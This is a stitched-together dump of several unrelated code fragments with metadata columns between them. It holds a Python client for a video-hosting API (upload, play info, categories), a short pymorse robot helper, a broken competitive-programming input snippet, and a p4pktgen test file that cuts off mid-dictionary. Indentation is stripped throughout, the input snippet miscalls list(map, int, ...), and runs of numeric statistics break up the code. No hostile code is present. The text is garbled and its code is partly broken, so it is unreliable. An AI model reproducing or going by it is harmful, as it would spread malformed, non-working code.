"OwnerId": owner_id,
"ProjectId": project_id}
return self._handle_request(api_request).result
def search_editing_project(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
end_time=None,
start_time=None,
owner_id=None,
title=None,
page_no=None,
page_size=None,
sort_by=None,
status=None):
api_request = APIRequest('SearchEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"EndTime": end_time,
"StartTime": start_time,
"OwnerId": owner_id,
"Title": title,
"PageNo": page_no,
"PageSize": page_size,
"SortBy": sort_by,
"Status": status}
return self._handle_request(api_request).result
def produce_editing_project_video(
self,
resource_owner_id=None,
media_metadata=None,
resource_owner_account=None,
description=None,
owner_id=None,
title=None,
cover_url=None,
user_data=None,
timeline=None,
produce_config=None,
project_id=None):
api_request = APIRequest('ProduceEditingProjectVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"MediaMetadata": media_metadata,
"ResourceOwnerAccount": resource_owner_account,
"Description": description,
"OwnerId": owner_id,
"Title": title,
"CoverURL": cover_url,
"UserData": user_data,
"Timeline": timeline,
"ProduceConfig": produce_config,
"ProjectId": project_id}
return self._handle_request(api_request).result
def get_editing_project_materials(
self,
resource_owner_id=None,
material_type=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
type_=None,
project_id=None):
api_request = APIRequest('GetEditingProjectMaterials', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"MaterialType": material_type,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"Type": type_,
"ProjectId": project_id}
return self._handle_request(api_request).result
def get_editing_project(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
project_id=None):
api_request = APIRequest('GetEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"ProjectId": project_id}
return self._handle_request(api_request).result
def delete_editing_project(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
project_ids=None,
owner_id=None):
api_request = APIRequest('DeleteEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"ProjectIds": project_ids,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def add_editing_project(
self,
cover_url=None,
division=None,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
description=None,
timeline=None,
owner_id=None,
title=None):
api_request = APIRequest('AddEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"CoverURL": cover_url,
"Division": division,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"Description": description,
"Timeline": timeline,
"OwnerId": owner_id,
"Title": title}
return self._handle_request(api_request).result
def get_mezzanine_info(
self,
resource_owner_id=None,
resource_owner_account=None,
video_id=None,
preview_segment=None,
output_type=None,
addition_type=None,
owner_id=None,
auth_timeout=None):
api_request = APIRequest('GetMezzanineInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"PreviewSegment": preview_segment,
"OutputType": output_type,
"AdditionType": addition_type,
"OwnerId": owner_id,
"AuthTimeout": auth_timeout}
return self._handle_request(api_request).result
def update_category(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_id=None,
owner_id=None,
cate_name=None):
api_request = APIRequest('UpdateCategory', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateId": cate_id,
"OwnerId": owner_id,
"CateName": cate_name}
return self._handle_request(api_request).result
def get_categories(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_id=None,
page_no=None,
page_size=None,
sort_by=None,
owner_id=None,
type_=None):
api_request = APIRequest('GetCategories', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateId": cate_id,
"PageNo": page_no,
"PageSize": page_size,
"SortBy": sort_by,
"OwnerId": owner_id,
"Type": type_}
return self._handle_request(api_request).result
def delete_category(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_id=None,
owner_id=None):
api_request = APIRequest('DeleteCategory', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateId": cate_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def add_category(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
type_=None,
parent_id=None,
cate_name=None):
api_request = APIRequest('AddCategory', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"Type": type_,
"ParentId": parent_id,
"CateName": cate_name}
return self._handle_request(api_request).result
def get_play_info(
self,
resource_owner_id=None,
stream_type=None,
formats=None,
resource_owner_account=None,
channel=None,
video_id=None,
player_version=None,
owner_id=None,
result_type=None,
rand=None,
re_auth_info=None,
play_config=None,
output_type=None,
definition=None,
auth_timeout=None,
auth_info=None):
api_request = APIRequest('GetPlayInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"StreamType": stream_type,
"Formats": formats,
"ResourceOwnerAccount": resource_owner_account,
"Channel": channel,
"VideoId": video_id,
"PlayerVersion": player_version,
"OwnerId": owner_id,
"ResultType": result_type,
"Rand": rand,
"ReAuthInfo": re_auth_info,
"PlayConfig": play_config,
"OutputType": output_type,
"Definition": definition,
"AuthTimeout": auth_timeout,
"AuthInfo": auth_info}
return self._handle_request(api_request).result
def create_upload_image(
self,
resource_owner_id=None,
image_type=None,
resource_owner_account=None,
image_ext=None,
description=None,
owner_id=None,
title=None,
tags=None,
storage_location=None,
user_data=None,
original_file_name=None,
cate_id=None,
app_id=None):
api_request = APIRequest('CreateUploadImage', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ImageType": image_type,
"ResourceOwnerAccount": resource_owner_account,
"ImageExt": image_ext,
"Description": description,
"OwnerId": owner_id,
"Title": title,
"Tags": tags,
"StorageLocation": storage_location,
"UserData": user_data,
"OriginalFileName": original_file_name,
"CateId": cate_id,
"AppId": app_id}
return self._handle_request(api_request).result
def set_message_callback(
self,
auth_key=None,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
event_type_list=None,
mns_queue_name=None,
resource_real_owner_id=None,
owner_id=None,
callback_type=None,
callback_switch=None,
mns_endpoint=None,
app_id=None,
auth_switch=None,
callback_url=None):
api_request = APIRequest('SetMessageCallback', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"AuthKey": auth_key,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"EventTypeList": event_type_list,
"MnsQueueName": mns_queue_name,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"CallbackType": callback_type,
"CallbackSwitch": callback_switch,
"MnsEndpoint": mns_endpoint,
"AppId": app_id,
"AuthSwitch": auth_switch,
"CallbackURL": callback_url}
return self._handle_request(api_request).result
def get_message_callback(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
app_id=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('GetMessageCallback', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"AppId": app_id,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_video_info(
self,
resource_owner_id=None,
resource_owner_account=None,
description=None,
video_id=None,
owner_id=None,
title=None,
tags=None,
cover_url=None,
download_switch=None,
cate_id=None,
custom_media_info=None,
status=None):
api_request = APIRequest('UpdateVideoInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Description": description,
"VideoId": video_id,
"OwnerId": owner_id,
"Title": title,
"Tags": tags,
"CoverURL": cover_url,
"DownloadSwitch": download_switch,
"CateId": cate_id,
"CustomMediaInfo": custom_media_info,
"Status": status}
return self._handle_request(api_request).result
def get_video_play_auth(
self,
resource_owner_id=None,
resource_owner_account=None,
re_auth_info=None,
play_config=None,
auth_info_timeout=None,
video_id=None,
owner_id=None):
api_request = APIRequest('GetVideoPlayAuth', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"ReAuthInfo": re_auth_info,
"PlayConfig": play_config,
"AuthInfoTimeout": auth_info_timeout,
"VideoId": video_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_video_list(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_id=None,
page_no=None,
page_size=None,
end_time=None,
sort_by=None,
start_time=None,
owner_id=None,
status=None,
storage_location=None):
api_request = APIRequest('GetVideoList', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateId": cate_id,
"PageNo": page_no,
"PageSize": page_size,
"EndTime": end_time,
"SortBy": sort_by,
"StartTime": start_time,
"OwnerId": owner_id,
"Status": status,
"StorageLocation": storage_location}
return self._handle_request(api_request).result
def get_video_info(
self,
resource_owner_id=None,
resource_owner_account=None,
video_id=None,
addition_type=None,
result_types=None,
owner_id=None):
api_request = APIRequest('GetVideoInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"AdditionType": addition_type,
"ResultTypes": result_types,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_video(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
video_ids=None):
api_request = APIRequest('DeleteVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"VideoIds": video_ids}
return self._handle_request(api_request).result
def refresh_upload_video(
self,
resource_owner_id=None,
resource_owner_account=None,
video_id=None,
owner_id=None):
api_request = APIRequest('RefreshUploadVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def create_upload_video(
self,
resource_owner_id=None,
resource_owner_account=None,
transcode_mode=None,
ip=None,
description=None,
file_size=None,
owner_id=None,
title=None,
tags=None,
storage_location=None,
cover_url=None,
user_data=None,
file_name=None,
template_group_id=None,
cate_id=None,
app_id=None,
workflow_id=None,
custom_media_info=None):
api_request = APIRequest('CreateUploadVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TranscodeMode": transcode_mode,
"IP": ip,
"Description": description,
"FileSize": file_size,
"OwnerId": owner_id,
"Title": title,
"Tags": tags,
"StorageLocation": storage_location,
"CoverURL": cover_url,
"UserData": user_data,
"FileName": file_name,
"TemplateGroupId": template_group_id,
"CateId": cate_id,
"AppId": app_id,
"WorkflowId": workflow_id,
"CustomMediaInfo": custom_media_info}
return self._handle_request(api_request).result
| 37.626984
| 99
| 0.583128
| 8,132
| 85,338
| 5.747787
| 0.069233
| 0.068591
| 0.053893
| 0.064183
| 0.81911
| 0.798314
| 0.768126
| 0.730472
| 0.705569
| 0.67337
| 0
| 0.000276
| 0.321709
| 85,338
| 2,267
| 100
| 37.643582
| 0.807218
| 0.006738
| 0
| 0.766588
| 0
| 0
| 0.151683
| 0.013593
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059294
| false
| 0
| 0.001412
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e61465b89e9c57fb6877ea067218718787bc567f
| 132
|
py
|
Python
|
crash_generator/manual_connector/manual_connector.py
|
donlelef/robot
|
5aeedaa05117bbb0f766167ae66ade143e0e91ea
|
[
"MIT"
] | null | null | null |
crash_generator/manual_connector/manual_connector.py
|
donlelef/robot
|
5aeedaa05117bbb0f766167ae66ade143e0e91ea
|
[
"MIT"
] | null | null | null |
crash_generator/manual_connector/manual_connector.py
|
donlelef/robot
|
5aeedaa05117bbb0f766167ae66ade143e0e91ea
|
[
"MIT"
] | null | null | null |
from pymorse import Morse
from crash_generator.robot.robot import Robot
def get_robot():
    """Create a Robot bound to the running Morse simulator.

    Returns:
        Robot: wrapper around the simulator's default robot handle and
        the simulator connection itself.
    """
    # Reuse one Morse connection: the original called Morse() twice,
    # opening two separate simulator sessions (one just to fetch .robot,
    # a second passed to Robot), which wastes a socket and risks the two
    # handles drifting out of sync.
    simulation = Morse()
    return Robot(simulation.robot, simulation)
| 18.857143
| 45
| 0.757576
| 19
| 132
| 5.157895
| 0.526316
| 0.204082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143939
| 132
| 6
| 46
| 22
| 0.867257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
e62da4e25b3cdb1f4a0a2340600fb2c0ef7b1b7b
| 146
|
py
|
Python
|
ABC151-200/ABC196/abc196_e.py
|
billyio/atcoder
|
9d16765f91f28deeb7328fcc6c19541ee790941f
|
[
"MIT"
] | 1
|
2021-02-01T08:48:07.000Z
|
2021-02-01T08:48:07.000Z
|
ABC151-200/ABC196/abc196_e.py
|
billyio/atcoder
|
9d16765f91f28deeb7328fcc6c19541ee790941f
|
[
"MIT"
] | null | null | null |
ABC151-200/ABC196/abc196_e.py
|
billyio/atcoder
|
9d16765f91f28deeb7328fcc6c19541ee790941f
|
[
"MIT"
] | null | null | null |
# Read N, then N lines of integer pairs, then Q and a line of Q integers.
N = int(input())
# Fixed: the original wrote `list(map, int, input().split())`, which passes
# the `map` builtin itself plus two extra arguments to list() — a TypeError.
# The intended call is map(int, ...) applied to the split tokens.
at = [list(map(int, input().split())) for _ in range(N)]
Q = int(input())
x = list(map(int, input().split()))
# for _ in range(s
| 24.333333
| 56
| 0.582192
| 26
| 146
| 3.192308
| 0.5
| 0.385542
| 0.240964
| 0.361446
| 0.722892
| 0.722892
| 0.722892
| 0.722892
| 0
| 0
| 0
| 0
| 0.171233
| 146
| 6
| 57
| 24.333333
| 0.68595
| 0.109589
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
05240770178f9265ab228d6c34327d704001fb47
| 34,458
|
py
|
Python
|
tests/check_system.py
|
iand-xilinx/p4pktgen
|
bc99dc7c797a72fa3469e052b38f77829db3eacd
|
[
"BSD-3-Clause"
] | null | null | null |
tests/check_system.py
|
iand-xilinx/p4pktgen
|
bc99dc7c797a72fa3469e052b38f77829db3eacd
|
[
"BSD-3-Clause"
] | null | null | null |
tests/check_system.py
|
iand-xilinx/p4pktgen
|
bc99dc7c797a72fa3469e052b38f77829db3eacd
|
[
"BSD-3-Clause"
] | null | null | null |
from p4pktgen.main import process_json_file
from p4pktgen.config import Config
from p4pktgen.core.translator import TestPathResult
class CheckSystem:
    def check_demo1b(self):
        """Run p4pktgen on examples/demo1b.json and assert that every
        analysed path is classified exactly as expected.

        Keys of ``expected_results`` are path tuples: parser states,
        ``(node, (branch_taken, (file, line, condition)))`` entries for
        control-flow conditions, and ``(table, action)`` pairs.
        """
        Config().load_test_defaults()
        results = process_json_file('examples/demo1b.json')
        expected_results = {
            ('start', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (False, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (True, (u'demo1b.p4', 143, u'acl_drop')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_drop'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_8', (True, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'sink', (u'node_2', (False, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()')))):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_drop'), (u'node_4', (True, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act', u'act')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_8', (False, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET')))):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_8', (False, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET')))):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_8', (True, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET'))), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_8', (True, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET'))), (u'ingress.mac_da', u'ingress.my_drop')):
            TestPathResult.SUCCESS
        }
        assert results == expected_results
    def check_demo1(self):
        """Run p4pktgen on the uniquified demo1 program and assert the
        classification of every path, including UNINITIALIZED_READ paths
        that skip parse_ipv4."""
        Config().load_test_defaults()
        results = process_json_file(
            'examples/demo1-action-names-uniquified.p4_16.json')
        expected_results = {
            ('start', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.my_drop1')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ipv4', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'ingress.mac_da', u'ingress.my_drop2')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.my_drop1'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ipv4', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.my_drop1'), (u'ingress.mac_da', u'ingress.my_drop2')):
            TestPathResult.UNINITIALIZED_READ
        }
        assert results == expected_results
    def check_demo1_no_uninit_reads(self):
        """Run p4pktgen on the demo1 variant with no uninitialized reads;
        all paths classify as SUCCESS or NO_PACKET_FOUND only."""
        Config().load_test_defaults()
        results = process_json_file(
            'examples/demo1-no-uninit-reads.p4_16.json')
        expected_results = {
            ('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_5', (True, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_5', (False, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped')))):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_5', (True, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped'))), (u'ingress.mac_da', u'ingress.my_drop')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_5', (True, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped'))), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_5', (False, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (False, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (False, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()')))):
            TestPathResult.SUCCESS
        }
        assert results == expected_results
    def check_demo9b(self):
        """Run p4pktgen on examples/demo9b.json; non-IPv6 parser paths
        read an uninitialized hdr.ipv6.version and must be flagged as
        UNINITIALIZED_READ, while IPv6 paths succeed."""
        Config().load_test_defaults()
        results = process_json_file('examples/demo9b.json')
        expected_results = {
            ('start', 'parse_ethernet', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ethernet', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ethernet', 'parse_ipv4', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ethernet', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ethernet', 'parse_ipv4', 'parse_tcp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ethernet', 'parse_ipv4', 'parse_tcp', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ethernet', 'parse_ipv4', 'parse_udp', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ethernet', 'parse_ipv4', 'parse_udp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ethernet', 'parse_ipv6', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.SUCCESS,
            ('start', 'parse_ethernet', 'parse_ipv6', 'parse_tcp', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.SUCCESS,
            ('start', 'parse_ethernet', 'parse_ipv6', 'parse_udp', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
            TestPathResult.SUCCESS,
            ('start', 'parse_ethernet', 'parse_ipv6', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (False, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act_0', u'act_0')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ethernet', 'parse_ipv6', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (True, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act', u'act')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ethernet', 'parse_ipv6', 'parse_tcp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (False, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act_0', u'act_0')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ethernet', 'parse_ipv6', 'parse_tcp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (True, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act', u'act')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ethernet', 'parse_ipv6', 'parse_udp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (False, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act_0', u'act_0')):
            TestPathResult.SUCCESS,
